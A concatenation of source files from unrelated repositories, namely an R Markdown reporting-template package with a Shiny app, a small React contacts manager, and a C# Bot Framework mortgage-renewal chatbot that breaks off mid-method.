# load R template package
library(exampleRTemplatePackage)
```
```{r inputParameters-data}
# load data
data(state)
# input parameters - data
dataset <- data.frame(state.x77,
region = state.region,
division = state.division
)
variables <- grep("region|division", colnames(dataset),
invert = TRUE, value = TRUE)
covariate <- "region"
```
```{r inputParameters-analysis}
boxPlot <- FALSE
pairwiseComparisonPlot <- TRUE
pairwiseComparisonPlotColorVariable <- covariate
typePlot <- "baseR"
includeLda <- TRUE
covariateLda <- covariate
dimensionsLda <- 3
```
<!-- call/run child template -->
```{r runAnalysis, child = getPathTemplate("exampleTemplate_child.Rmd")}
```
<!-- call the child template with the analysis, contained in the `exampleReportingPackage` package -->
<file_sep>
```{r pairwiseComparisonChild-inputParameters-{{iPC}}}
pairwiseComparisonVariablesDescription <- pairwiseComparisonVariablesDescriptions[{{iPC}}] # description
pairwiseComparisonVariable <- pairwiseComparisonVariables[, {{iPC}}] # variables to compare
colorVariable <- if(exists("pairwiseComparisonPlotColorVariable", where = environment()))
pairwiseComparisonPlotColorVariable # variable used for coloring
if(!exists("typePlot", where = environment())) typePlot <- "rbokeh" # type plot
message("Creation of pairwise comparison plot of ", pairwiseComparisonVariablesDescription, ".")
```
## Pairwise comparison of `r pairwiseComparisonVariablesDescription`
```{r pairwiseComparisonChild-correlationTest-{{iPC}}}
resCorTest <- cor.test(
x = dataset[, pairwiseComparisonVariable[1]],
y = dataset[, pairwiseComparisonVariable[2]]
)
```
The **_Pearson_ correlation** between the
`r pairwiseComparisonVariablesDescription` is:
**`r round(resCorTest$estimate, 2)`** (p-value =
`r format(resCorTest$p.value, scientific = TRUE, digits = 2)`).
```{r pairwiseComparisonChild-extractData-{{iPC}}}
# color palette
library(oaColors)
colorPalette <- oaPalette(
numColors = ifelse(!is.null(colorVariable), nlevels(dataset[, colorVariable]), 1))
names(colorPalette) <- if(!is.null(colorVariable)) levels(dataset[, colorVariable]) else "all points"
figCaption <- paste("Pairwise comparison of", pairwiseComparisonVariablesDescription)
```
Figure \@ref(`r paste0("fig:pairwiseComparisonChild-plots-", {{iPC}})`) shows
the pairwise comparison plot of `r pairwiseComparisonVariablesDescription`.
```{r pairwiseComparisonChild-plots-{{iPC}}, fig.cap = figCaption, results = ifelse(typePlot %in% c("rbokeh", "plotly"), 'markup', "asis")}
pairwiseComparisonPlot(
dataset = dataset,
variables = pairwiseComparisonVariable,
description = pairwiseComparisonVariablesDescription,
colorVariable = colorVariable,
colorPalette = colorPalette,
typePlot = typePlot)
```<file_sep>#' get path of a file contained in the 'templates' folder of the \code{exampleRTemplatePackage} library
#' @param file string, name of the template file
#' @param userType string, use type, either:
#' \itemize{
#' \item{'user': }{the template path is extracted from the installed \code{exampleRTemplatePackage} library}
#' \item{'developer:' }{the name of the template is returned, assuming that the developer works
#' in the 'inst/templates' folder of the package directly
#' }
#' }
#' @return string with output path(s) of the specified file
#' @author <NAME> and <NAME>
#' @export
getPathFile <- function(file, userType = c("user", "developer")){
userType <- match.arg(userType)
switch(userType,
'user' = system.file(file.path("templates", file), package = "exampleRTemplatePackage"),
'developer' = file
)
}
#' get path of template
#' @param template string, name of the template file
#' @inherit getPathFile params return
#' @author <NAME> and <NAME>
#' @export
getPathTemplate <- function(template, userType = c("user", "developer")){
getPathFile(file = template, userType = userType)
}
#' get path of start template contained in the \code{exampleRTemplatePackage} package
#' @return path of start template, from the installed \code{exampleRTemplatePackage} library
#' @author <NAME> and <NAME>
#' @export
getPathStartTemplate <- function(){
system.file("templates/start/startTemplate.Rmd", package = "exampleRTemplatePackage")
}
#' Function to create collapse with button in html output
#' @param input the text or function (see type) that should be printed
#' @param id the id of the environment
#' @param titleButton the title of the button
#' @param type whether the input is a function or text
#' @param color the color of the text in the button
#' @param borderColor the color of the border of the button
#' @return html code with input in a collapsible environment
#' @author <NAME>
#' @export
collapseInHtml <- function(input, id, titleButton, type = c("function", "text"), color = "#479ace", borderColor = "#479ace"){
id <- gsub("[(]|[)]|[.]| ", "",id)
cat(paste0("<button type=\"button\" class=\"btn\" style=\"color:", color, " !important;border-color:",
borderColor, " !important; background-color: white !important\" id=\"buttonId\" data-toggle=\"collapse\" title=\"", paste0("Click to show or hide ", tolower(titleButton)),"\"
data-target=\"#", id, "\">", titleButton, " ", "<span class=\"caret\"></span>", "</button>"))
cat(paste0("<div id=\"", id, "\" class=\"collapse buttonArrow\">"))
res <- switch(type,
'function' = input(),
"text" = cat(input))
cat("\n\n")
cat("</div>")
if(type == "function") return(res)
}
#' format the sessionInfo output for markdown
#' (sort packages for each slot)
#' @param order, string, either 'alphabetically' or 'original',
#' depending if the strings in each slot (e.g. the packages in 'attached base packages') should be
#' sorted alphabetically or if no sorting should be done
#' @param addVersionBioconductor logical, if TRUE (FALSE by default) print also Bioconductor version (BiocInstaller)
#' @return no returned value, the reformatted output of sessionInfo is printed in the current console
#' @importFrom utils capture.output packageDescription packageVersion
#' @author <NAME>
#' @export
printSessionInfoMarkdown <- function(order = c("alphabetically", "original"), addVersionBioconductor = TRUE){
order <- match.arg(order)
# get ourput of sessionInfo
sessionInfo <- capture.output(print(sessionInfo()))
idxEmpty <- which(sessionInfo == "")
sessionInfo <- sessionInfo[!(1:length(sessionInfo)) %in% idxEmpty]
# idx of elements to paste intop one string
idxToPaste <- which(grepl("\\[[[:digit:]]{1,}\\]", sessionInfo))
idxSep <- c(0, which(diff(idxToPaste) != 1), length(idxToPaste))
# idx of elements to paste
idxToPasteSplit <- sapply(1:(length(idxSep)-1), function(i) idxToPaste[(idxSep[i]+1):(idxSep[i+1])])
# paste the elements with ', '
elPaste <- sapply(idxToPasteSplit, function(i){
res <- gsub("^ *|\\[[[:digit:]]{1,}\\]| *$", "", sessionInfo[i])
res2 <- c(sapply(res, function(x){
res1 <- strsplit(x, split = " ")[[1]]; res1[res1!=""]#paste(res1[res1!=""], collapse = ", ")
}))
res2Vector <- unlist(res2)
paste(
switch(order, 'alphabetically' = sort(res2Vector), 'original' = res2Vector),
collapse = ", ")
})
# idx of elements to keep from sessionInfo
idxKept <- which(!(1:length(sessionInfo)) %in% idxToPaste)
# create the final output
idxAddedInit <- c(which(diff(idxKept) > 1), length(idxKept)) + 1
# idx of pasted elements
idxAdded <- idxAddedInit + 0:(length(idxAddedInit)-1)
resFinal <- rep("", length(idxKept) + length(idxAdded))
resFinal[idxAdded] <- elPaste
# idx of elements kept from the sessionInfo
resFinal[resFinal == ""] <- sessionInfo[idxKept]
# add list in markdown
idxList <- idxAdded-1
resFinal[idxList] <- paste0("* ", resFinal[idxAdded-1], "\n")
idxNotList <- !(1:length(resFinal)) %in% idxList
resFinal[idxNotList] <- paste0(resFinal[idxNotList], "\n\n")
# print the result into the console
cat(resFinal)
if(addVersionBioconductor){
if(!requireNamespace("BiocInstaller", quietly = TRUE)){
cat("* Bioconductor (BiocInstaller) version:",
as.character(packageVersion("BiocInstaller")))
}
}
}
#' get prefix for section in markdown ('#') for a number of level
#' @param level integer, level of section, e.g. 2
#' @return string with prefix for section, e.g. '##'
#' @author <NAME>
#' @export
getPrefixSection <- function(level){
paste(rep("#", level), collapse = "")
}
#' capitalize the first letter of a word, from the help of the 'toupper' function
#' @param x string
#' @param onlyFirst logical, if TRUE (FALSE by default)
#' capitalize the first letter of the first forward only
#' @param rev logical, if TRUE (FALSE by default), set first letter to lower case (otherwise upper case)
#' @return string with first letter capitalized
#' @author author of the 'toupper' function?
#' @export
simpleCap <- function(x, onlyFirst = FALSE, rev = FALSE) {
paste0c <- function(...) paste(..., sep = "", collapse = " ")
fctToUse <- get(ifelse(rev, "tolower", "toupper"))
simpleCap1 <- function(s) paste0c(fctToUse(substring(s, 1, 1)), substring(s, 2))
sapply(x, function(x){
s <- strsplit(x, " ")[[1]]
if(onlyFirst) paste0c(c(simpleCap1(s[1]), s[-1])) else simpleCap1(s)
})
}<file_sep>shinyServer(function(input, output, session) {
includeCSS("./www/custom.css")
# load dataset
dataset <- reactive({
switch(input$dataset,
'iris' = {
data(iris)
iris
},
'warpbreaks' = {
data(warpbreaks)
warpbreaks$warp <- factor(with(warpbreaks, paste0(wool, tension)))
warpbreaks
},
'Pima Indians Diabetes' = {
library(mlbench)
data(PimaIndiansDiabetes)
PimaIndiansDiabetes
},
'US states' = {
data(state)
# input parameters - data
dataset <- data.frame(state.x77,
region = state.region,
division = state.division
)
}
)
})
# specify variables
variables <- eventReactive(
dataset(), {
switch(input$dataset,
'iris' = grep("Species", colnames(dataset()), invert = TRUE, value = TRUE),
'warpbreaks' = "breaks",
'Pima Indians Diabetes' = grep("diabetes", colnames(dataset()), invert = TRUE, value = TRUE),
'US states' = grep("region|division", colnames(dataset()), invert = TRUE, value = TRUE)
)
})
output$moreThanOneVariable <- reactive(print(length(variables()) > 1))
outputOptions(output, "moreThanOneVariable", suspendWhenHidden = FALSE)
output$moreThanTwoVariables <- reactive(print(length(variables()) > 2))
outputOptions(output, "moreThanTwoVariables", suspendWhenHidden = FALSE)
# specify covariate
covariate <- eventReactive(
dataset(), {
switch(input$dataset,
'iris' = "Species",
'warpbreaks' = "warp",
'Pima Indians Diabetes' = "diabetes",
'US states' = "region"
)
})
callModule(
# module specific
module = runReportShiny, id = "analysis",
labelReport = "analysis",
# parameters not in modules
outputDir = outputDir,
paramsUI = reactive(reactiveValuesToList(input)),
dataset = dataset,
variables = variables,
covariate = covariate
)
})
<file_sep>#' wrapper to generate pairwise comparison plot
#' @param dataset data.frame with data
#' @param variables columns of \code{dataset} with variable for x and y
#' @param description text description of the pairwise comparison (used for the title)
#' @param colorVariable column of \code{dataset} with color variable
#' @param colorPalette string with color palette, if \code{colorVariable}
#' \itemize{
#' \item{is specified: }{named string with color for each level (name) of \code{colorVariable}}
#' \item{is not specified: }{unique element}
#' }
#' @param typePlot string with type of the plot, either 'baseR' (\code{plot}),
#' 'ggplot2', 'plotly', 'rbokeh'
#' @return no returned value, a plot is drawn in the current window
#' @importFrom graphics plot
#' @author <NAME>
#' @export
pairwiseComparisonPlot <- function(
dataset, variables,
description,
colorVariable = NULL, colorPalette = "black",
typePlot = c("baseR", "ggplot2", "plotly", "rbokeh")){
typePlot <- match.arg(typePlot)
titlePlot <- paste("Pairwise comparison of", description)
if(typePlot == 'baseR'){
plot(dataset[, variables], pch = 19,
col = if(!is.null(colorVariable)) colorPalette[dataset[, colorVariable]] else colorPalette,
main = titlePlot)
}else if(typePlot %in% c("ggplot2", "plotly")){
if(!requireNamespace("ggplot2", quietly = TRUE))
stop(paste("The package 'ggplot2' need to be loaded to create the plot."))
aesStringsArgs <- c(
list(
x = variables[1],
y = variables[2]
),
if(!is.null(colorVariable))
list(col = colorVariable)
)
gg <- ggplot(data = dataset) + # dataset[, c(variables, colorVariable)]
geom_point(do.call("aes_string", aesStringsArgs)) +
scale_colour_manual(values = colorPalette) +
ggtitle(titlePlot)
if(typePlot == "ggplot2") print(gg)
if(typePlot == "plotly"){
if(!requireNamespace("plotly", quietly = TRUE))
stop(paste("The package 'plotly' need to be loaded to create the plot."))
plotly::ggplotly(p = gg)
}
}else if(typePlot == "rbokeh"){
if(!requireNamespace("rbokeh", quietly = TRUE))
stop(paste("The package 'rbokeh' need to be loaded to create the plot."))
color <- if(!is.null(colorVariable)) colorVariable else colorPalette
f <- rbokeh::figure(title = titlePlot)
# rownames(dataset) <- paste0("sample", 1:nrow(dataset))
rbokeh::ly_points(
fig = f,
data = dataset, #dataset[, c(variables, colorVariable)]
x = variables[1],
y = variables[2],
# currently cannot specify an aesthetic and palette in rbokeh
color = color#,
# hoover = paste(paste0("@", colnames(dataset)[1]), collapse = "\n")
)
}
}
| 6a874b67c0cc34dfc634dad5db9238b34c8d32ce | [
"R",
"RMarkdown"
] | 15 | RMarkdown | isabella232/useR2017_templatePackageExample | 9df299d600799e9661ad4a1750b9334140fc7adf | 6e64eee99443e233427da1c39795339ac8b2b3c2 |
refs/heads/master | <repo_name>zerovan/reactProject<file_sep>/src/components/Contacts.js
import React, { Component } from 'react';
import Detail from './Detail.js';
import { Consumer } from '../context';
class Contacts extends Component {
render() {
return (
<Consumer>
{value => {
const { contacts } = value;
console.log(contacts);
return (
<React.Fragment>
{contacts.map(row => (
<Detail key={row.id} contact={row} />
)
)}
</React.Fragment>
);
}}
</Consumer>
);
}
}
export default Contacts;<file_sep>/src/components/Detail.js
import React, { Component } from 'react';
import propType from 'prop-types';
import { Consumer } from '../context';
import { Link } from 'react-router-dom';
class Detail extends Component {
state = {
count: false
};
Myclick(e) {
this.setState({
count: !this.state.count
});
}
trash = (id, dispatch) => {
const action = {
type: "DELETE_CONTACT",
payload: id
}
dispatch(action);
}
update = (id, dispatch) => {
}
render() {
const contact = this.props.contact;
return (
<Consumer>
{value => {
return (
<React.Fragment>
<h1>
<div className="container">
{this.state.count ?
(<div className='alert alert-primary'>
<span onClick={this.Myclick.bind(this)}>{contact.name}</span>
<span className="float-right px-2"><i className="fa fa-trash" onClick={this.trash.bind(this, contact.id, value.dispatch)}></i></span>
<span className="float-right px-2"><Link to={`/edit/${contact.id}`} ><i className="fa fa-pen"></i></Link></span>
</div>) :
(<div className='alert alert-danger'>
<span onClick={this.Myclick.bind(this)}>{contact.phone}</span>
<span className="float-right px-2"><i className="fa fa-trash" onClick={this.trash.bind(this, contact.id, value.dispatch)}></i></span>
<span className="float-right px-2"><Link to={`/edit/${contact.id}`} ><i className="fa fa-pen"></i></Link></span>
</div>)
}
</div>
</h1>
</React.Fragment>
);
}
}
</Consumer>
);
}
}
Detail.propType = {
contact: propType.object.isRequired
}
export default Detail;
<file_sep>/src/components/Edit.js
import React, { Component } from 'react'
import { Consumer } from '../context';
import InputDryCode from './header/InputDryCode';
class Edit extends Component {
constructor() {
super();
this.flag = true;
}
state = {
name: "",
phone: "",
error: {},
}
onSubmitEditContact = (id, callback, e) => {
e.preventDefault();
if (this.state.name === "") {
this.setState({
error: {
name: "نام باید وارد شود",
}
});
return;
}
if (this.state.phone === "") {
this.setState({
error: {
phone: "موبایل باید وارد شود",
}
});
return;
}
const newContact = {
id,
name: this.state.name,
phone: this.state.phone,
}
const action = {
type: 'EDIT_CONTACT',
payload: newContact,
}
callback(action);
this.props.history.push("/details");
}
updateFirstState = (name, phone) => {
this.setState({
name,
phone,
error: {},
})
this.flag = false;
}
updateState = (e) => {
console.log(e.target.value);
this.setState({
[e.target.id]: e.target.value
});
};
render() {
const { editid } = this.props.match.params;
// contacts[contactIndex].name
return (
<Consumer>
{value => {
const { contacts, dispatch } = value;
let contactIndex;
contacts.forEach((row, index) => {
if (row.id == editid) {
contactIndex = index;
if (this.flag === true) {
this.updateFirstState(row.name, row.phone);
}
}
});
const { name, phone, error } = this.state;
console.log(contactIndex);
return (
<React.Fragment>
<br />
<div className="container text-right" style={{ direction: 'rtl' }}>
<form action="#" onSubmit={this.onSubmitEditContact.bind(this, editid, dispatch)}>
<InputDryCode
type="text"
id="name"
value={name}
onChange={this.updateState}
label={"نام"}
error={error.name}
/>
<InputDryCode
type="text"
id="phone"
value={phone}
onChange={this.updateState}
label={"تلفن"}
error={this.state.error.phone}
/>
<button type="submit" className="btn btn-primary">اصلاح</button>
</form>
</div>
<br />
</React.Fragment>
);
}
}
</Consumer>
);
}
}
export default Edit<file_sep>/src/components/header/Header.js
import React, { Component } from 'react';
import { Consumer } from '../../context';
import InputDryCode from './InputDryCode';
import uuid from 'uuid';
class Headers extends Component {
state = {
name: "",
phone: "",
error: {}
};
updateState = (e) => {
this.setState({
[e.target.id]: e.target.value
});
};
onSubmitContact = (callback, e) => {
e.preventDefault();
if (this.state.name === "") {
this.setState({
error: {
name: "نام باید وارد شود",
}
});
return;
}
if (this.state.phone === "") {
this.setState({
error: {
phone: "موبایل باید وارد شود",
}
});
return;
}
const newContact = {
id: uuid(),
name: this.state.name,
phone: this.state.phone,
}
const action = {
type: 'ADD_CONTACT',
payload: newContact,
}
callback(action);
this.setState({
name: '',
phone: '',
error: {}
})
this.props.history.push("/details");
}
render() {
const { name, phone, error } = this.state;
return (
<Consumer >
{value => {
const { dispatch } = value;
return (
<React.Fragment>
<br />
<div className="container text-right" style={{ direction: 'rtl' }}>
<form action="#" onSubmit={this.onSubmitContact.bind(this, dispatch)}>
<InputDryCode
type="text"
id="name"
value={name}
onChange={this.updateState}
label={"نام"}
error={error.name}
/>
<InputDryCode
type="text"
id="phone"
value={phone}
onChange={this.updateState}
label={"تلفن"}
error={this.state.error.phone}
/>
<button type="submit" className="btn btn-primary">افزودن</button>
</form>
</div>
<br />
</React.Fragment>
)
}
}
</Consumer>
);
}
}
export default Headers;
<file_sep>/src/components/pages/notFound.js
import React from 'react'
export default function notFound() {
return (
<div className="container text-right" >
<h1>
<span className="text-danger">404 not found</span>
<h1 className="mt-5" style={{ direction: 'rtl' }}>متاسفانه صفحه ی مورد نظر یافت نشد.</h1>
</h1>
</div>
)
}
<file_sep>/src/components/pages/apiTest.js
import React, { Component } from 'react';
import axios from 'axios';
export default class apiTest extends Component {
state = {
}
componentDidMount() {
axios.get('https://api.github.com/users/zerovan')
.then(res => console.log(res));
}
render() {
return (
<div>
in test
</div>
)
}
}
| f35a70a294b1522317de2bb4c29676b7650357df | [
"JavaScript"
] | 6 | JavaScript | zerovan/reactProject | ebecb3b95e9a3c6015e6aca02889258f614c44af | c772b82c0261fac6e663e64631a4f1bc47d08f48 |
refs/heads/master | <file_sep>namespace BasicBot.Models
{
/// <summary>Identifies the rate type of a mortgage product.</summary>
public enum MortgageType
{
    Variable,    // standard variable rate
    Fixed2Years, // rate fixed for two years
    Fixed5Years  // rate fixed for five years
}
}
<file_sep>// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// See https://github.com/microsoft/botbuilder-samples for a more comprehensive list of samples.
using System;
using System.Linq;
using System.Threading;
using System.Threading.Tasks;
using BasicBot;
using BasicBot.Dialog;
using Microsoft.Bot.Builder;
using Microsoft.Bot.Schema;
using Microsoft.Extensions.Logging;
namespace Microsoft.BotBuilderSamples
{
/// <summary>
/// Main entry point and orchestration for the bot: drives the savings dialog set
/// for each incoming activity and persists conversation state at the end of every turn.
/// </summary>
public class BasicBot : IBot
{
    // Supported LUIS intents. Kept public because external components may reference them,
    // although no LUIS routing is performed in this class itself.
    public const string GreetingIntent = "Greeting";
    public const string CancelIntent = "Cancel";
    public const string HelpIntent = "Help";
    public const string NoneIntent = "None";

    /// <summary>
    /// Key in the bot config (.bot file) for the LUIS instance.
    /// In the .bot file, multiple instances of LUIS can be configured.
    /// </summary>
    public static readonly string LuisConfiguration = "BasicBotLuisApplication";

    private readonly ILogger<BasicBot> _logger;
    private readonly BotAccessors _accessors;
    private readonly SavingsDialogs _dialogs;

    /// <summary>
    /// Initializes a new instance of the <see cref="BasicBot"/> class.
    /// </summary>
    /// <param name="accessors">State property accessors for conversation and dialog state.</param>
    /// <param name="loggerFactory">Factory used to create this bot's logger.</param>
    /// <exception cref="ArgumentNullException">
    /// Thrown when <paramref name="accessors"/> or <paramref name="loggerFactory"/> is null.
    /// </exception>
    public BasicBot(BotAccessors accessors, ILoggerFactory loggerFactory)
    {
        if (loggerFactory == null)
        {
            throw new ArgumentNullException(nameof(loggerFactory));
        }

        _accessors = accessors ?? throw new ArgumentNullException(nameof(accessors));
        _logger = loggerFactory.CreateLogger<BasicBot>();
        _logger.LogTrace("BasicBot created.");
        _dialogs = new SavingsDialogs(_accessors.DialogStateAccessor);
    }

    /// <summary>
    /// Handles one turn of the conversation. Message activities continue the active
    /// dialog, falling back to the main menu when no dialog responded; conversation
    /// update activities greet newly added members with the main menu. Conversation
    /// state is saved before the turn completes.
    /// </summary>
    /// <param name="turnContext">Context object for the current turn.</param>
    /// <param name="cancellationToken">Token used to cancel asynchronous work.</param>
    /// <returns>A task that represents the turn processing.</returns>
    public async Task OnTurnAsync(ITurnContext turnContext, CancellationToken cancellationToken = default(CancellationToken))
    {
        var dc = await _dialogs.CreateContextAsync(turnContext, cancellationToken);

        if (turnContext.Activity.Type == ActivityTypes.Message)
        {
            await dc.ContinueDialogAsync(cancellationToken);

            // No active dialog handled the message: restart at the main menu.
            if (!turnContext.Responded)
            {
                await dc.BeginDialogAsync(SavingsDialogs.MainMenu, null, cancellationToken);
            }
        }
        else if (turnContext.Activity.Type == ActivityTypes.ConversationUpdate)
        {
            var activity = turnContext.Activity.AsConversationUpdateActivity();

            // Greet only when someone other than the bot itself joined the conversation.
            if (activity.MembersAdded.Any(member => member.Id != activity.Recipient.Id))
            {
                await dc.BeginDialogAsync(SavingsDialogs.MainMenu, null, cancellationToken);
            }
        }

        await _accessors.ConversationState.SaveChangesAsync(turnContext, false, cancellationToken);
    }
}
}
<file_sep>using System;
using System.Collections.Generic;
namespace BasicBot.Models
{
/// <summary>
/// In-memory stand-in for a customer data store: maps a customer's username to
/// their current mortgage and computes the renewal deals available to them.
/// </summary>
public static class CustomerData
{
    // Seed data keyed by username. (The email key is a redacted placeholder.)
    private static readonly IDictionary<string, Mortgage> data = new Dictionary<string, Mortgage>
    {
        {
            "<EMAIL>",
            new Mortgage { Type = MortgageType.Variable, IsUpForRenewal = true, Balance = 123500M, InterestRate = 3.99M, Term = 23, Description = "SVR 3.99%" }
        },
    };

    /// <summary>
    /// Looks up a customer's current mortgage together with the deals on offer.
    /// </summary>
    /// <param name="username">Key identifying the customer in the store.</param>
    /// <returns>
    /// A tuple of (current mortgage, available deals). The deals component is
    /// null when the mortgage is not up for renewal (see <see cref="GetDeals"/>).
    /// </returns>
    /// <exception cref="KeyNotFoundException">
    /// Thrown when <paramref name="username"/> is not present in the store.
    /// </exception>
    public static Tuple<Mortgage, IEnumerable<Mortgage>> Find(string username)
    {
        var current = data[username];
        return Tuple.Create(current, GetDeals(current));
    }

    /// <summary>
    /// Computes the renewal deals for the given mortgage.
    /// </summary>
    /// <param name="currentMortgage">The customer's current mortgage.</param>
    /// <returns>
    /// The available deals when the mortgage is up for renewal; otherwise null
    /// (callers are expected to handle the null case).
    /// </returns>
    private static IEnumerable<Mortgage> GetDeals(Mortgage currentMortgage)
    {
        if (!currentMortgage.IsUpForRenewal)
        {
            // No deals are offered outside the renewal window.
            return null;
        }

        return new[]
        {
            new Mortgage
            {
                Balance = currentMortgage.Balance,
                // Illustrative shorter term for the renewal offer.
                Term = currentMortgage.Term - 7,
                IsUpForRenewal = false,
                InterestRate = 1.35M,
                Type = MortgageType.Fixed2Years,
                Description = "Fixed 2 years 1.35%",
            }
        };
    }
}
}
<file_sep>using System.Collections.Generic;
using System.Linq;
using System.Threading;
using System.Threading.Tasks;
using BasicBot.Models;
using Microsoft.Bot.Builder;
using Microsoft.Bot.Builder.Dialogs;
using Microsoft.Bot.Builder.Dialogs.Choices;
using Microsoft.Bot.Schema;
namespace BasicBot.Dialog
{
/// <summary>Contains the set of dialogs and prompts for the hotel bot.</summary>
public class SavingsDialogs : DialogSet
{
/// <summary>The ID of the top-level dialog.</summary>
public const string MainMenu = "mainMenu";
/// <summary>
/// Initializes a new instance of the <see cref="SavingsDialogs"/> class,
/// registering the shared prompts and the waterfall dialogs used by the bot.
/// </summary>
/// <param name="dialogStateAccessor">Accessor for the dialog state property.</param>
public SavingsDialogs(IStatePropertyAccessor<DialogState> dialogStateAccessor)
    : base(dialogStateAccessor)
{
    // Prompts shared by the waterfall steps below.
    Add(new ChoicePrompt(Inputs.Choice));
    Add(new NumberPrompt<int>(Inputs.Number));

    // Top-level welcome dialog: present the menu, act on the choice, re-prompt.
    Add(new WaterfallDialog(MainMenu, new WaterfallStep[]
    {
        MainDialogSteps.PresentMenuAsync,
        MainDialogSteps.ProcessInputAsync,
        MainDialogSteps.RepeatMenuAsync,
    }));

    // "Remind me later" dialog (a single stub step).
    Add(new WaterfallDialog(Dialogs.RemindLater, new WaterfallStep[]
    {
        RemindLaterSteps.StubAsync,
    }));

    // Renewal dialog: show the best available deal and handle the response.
    Add(new WaterfallDialog(Dialogs.Renew, new WaterfallStep[]
    {
        BestDealSteps.ShowBestDealAsync,
        BestDealSteps.ProcessInputAsync,
        BestDealSteps.RepeatMenuAsync,
    }));
}
/// <summary>Contains the IDs for the other dialogs in the set.</summary>
private static class Dialogs
{
    public const string Renew = "renew";             // registered in the constructor (best-deal waterfall)
    public const string Explore = "explore";         // no visible usage in this chunk
    public const string RemindLater = "later";       // registered in the constructor (stub waterfall)
    public const string ApplyOnline = "applyOnline"; // referenced by the "Apply now" welcome option
    public const string CallBack = "callBack";       // no visible usage in this chunk
}
/// <summary>Contains the IDs for the prompts used by the dialogs.</summary>
private static class Inputs
{
    public const string Choice = "choicePrompt"; // registered as a ChoicePrompt in the constructor
    public const string Number = "numberPrompt"; // registered as a NumberPrompt<int> in the constructor
}
/// <summary>Contains the keys used to manage dialog state.</summary>
private static class Outputs
{
public const string GivenName = "givenName";
public const string UserName = "username";
public const string CurrentMortgage = "CurrentMortgage";
public const string AvailableDeals = "AvailableDeals";
}
/// <summary>Describes an option for the top-level dialog.</summary>
private class WelcomeChoice
{
/// <summary>Gets or sets the text to show the guest for this option.</summary>
public string Description { get; set; }
/// <summary>Gets or sets the ID of the associated dialog for this option.</summary>
public string DialogName { get; set; }
}
/// <summary>Contains the lists used to present options to the guest.</summary>
private static class Lists
{
/// <summary>Gets the options for the top-level dialog.</summary>
public static List<WelcomeChoice> WelcomeOptions { get; } = new List<WelcomeChoice>
{
new WelcomeChoice { Description = "Apply now", DialogName = Dialogs.ApplyOnline },
new WelcomeChoice { Description = "View details", DialogName = Dialogs.Renew },
new WelcomeChoice { Description = "Remind me later", DialogName = Dialogs.RemindLater },
};
private static readonly List<string> _welcomeList = WelcomeOptions.Select(x => x.Description).ToList();
/// <summary>Gets the choices to present in the choice prompt for the top-level dialog.</summary>
public static IList<Choice> WelcomeChoices { get; } = ChoiceFactory.ToChoices(_welcomeList);
/// <summary>Gets the reprompt action for the top-level dialog.</summary>
public static Activity WelcomeReprompt
{
get
{
var reprompt = MessageFactory.SuggestedActions(_welcomeList, "Please choose an option");
reprompt.AttachmentLayout = AttachmentLayoutTypes.List;
return reprompt as Activity;
}
}
public static Activity WelcomePrompt
{
get
{
var reprompt = MessageFactory.SuggestedActions(_welcomeList, "How would you like to continue?");
reprompt.AttachmentLayout = AttachmentLayoutTypes.List;
return reprompt as Activity;
}
}
/// <summary>Gets the options for the food-selection dialog.</summary>
public static List<WelcomeChoice> BestDealOptions { get; } = new List<WelcomeChoice>
{
new WelcomeChoice { Description = "Apply online", DialogName = Dialogs.ApplyOnline },
new WelcomeChoice { Description = "Call me", DialogName = Dialogs.CallBack },
};
private static readonly List<string> _bestDealList = BestDealOptions.Select(x => x.Description).ToList();
/// <summary>Gets the choices to present in the choice prompt for the food-selection dialog.</summary>
public static IList<Choice> BestDealChoices { get; } = ChoiceFactory.ToChoices(_bestDealList);
/// <summary>Gets the reprompt action for the food-selection dialog.</summary>
public static Activity BestDealReprompt
{
get
{
var reprompt = MessageFactory.SuggestedActions(_bestDealList, "Please choose an option");
reprompt.AttachmentLayout = AttachmentLayoutTypes.List;
return reprompt as Activity;
}
}
public static Activity BestDealPrompt
{
get
{
var reprompt = MessageFactory.SuggestedActions(_bestDealList, "How would you like to continue?");
reprompt.AttachmentLayout = AttachmentLayoutTypes.List;
return reprompt as Activity;
}
}
}
/// <summary>
/// Contains the waterfall dialog steps for the order-dinner dialog.
/// </summary>
private static class MainDialogSteps
{
public static async Task<DialogTurnResult> PresentMenuAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
var username = "<EMAIL>";
var givenname = "Stephen";
var deals = CustomerData.Find(username);
var activity = new Activity();
activity.Type = ActivityTypes.Typing;
activity.Text = "";
await stepContext.Context.SendActivityAsync("Hi " + givenname + "!");
await stepContext.Context.SendActivityAsync(activity);
Thread.Sleep(2000);
await stepContext.Context.SendActivityAsync("We are analysing your current mortgage deal and spending patterns.");
await stepContext.Context.SendActivityAsync(activity);
Thread.Sleep(3000);
await stepContext.Context.SendActivityAsync("Great news! Your house value went **up by 17%**.");
await stepContext.Context.SendActivityAsync(activity);
Thread.Sleep(1000);
stepContext.Values[Outputs.GivenName] = givenname;
stepContext.Values[Outputs.UserName] = username;
stepContext.Values[Outputs.CurrentMortgage] = deals.Item1;
stepContext.Values[Outputs.AvailableDeals] = deals.Item2;
// Greet the guest and ask them to choose an option.
await stepContext.Context.SendActivityAsync(
ProcessDeals(username),
cancellationToken: cancellationToken);
return await stepContext.PromptAsync(
Inputs.Choice,
new PromptOptions
{
Prompt = Lists.WelcomePrompt,
RetryPrompt = Lists.WelcomeReprompt,
Choices = Lists.WelcomeChoices,
},
cancellationToken);
}
public static async Task<DialogTurnResult> ProcessInputAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
// Begin a child dialog associated with the chosen option.
var choice = (FoundChoice)stepContext.Result;
var dialogId = Lists.WelcomeOptions[choice.Index].DialogName;
if (dialogId == Dialogs.ApplyOnline)
{
await stepContext.Context.SendActivityAsync("Thank you. [Click here](https://personal.rbs.co.uk/personal/mortgages/secure/mortgage-agreement-in-principle.html) to complete your paperless application today.", cancellationToken: cancellationToken);
return await stepContext.CancelAllDialogsAsync(cancellationToken);
}
return await stepContext.BeginDialogAsync(dialogId, stepContext.Values, cancellationToken);
}
public static async Task<DialogTurnResult> RepeatMenuAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
// Start this dialog over again.
return await stepContext.ReplaceDialogAsync(MainMenu, null, cancellationToken);
}
private static string ProcessDeals(string username)
{
var customerData = CustomerData.Find(username);
var maxSavingDeal = customerData.Item2.OrderBy(m => m.TotalRepayment).First();
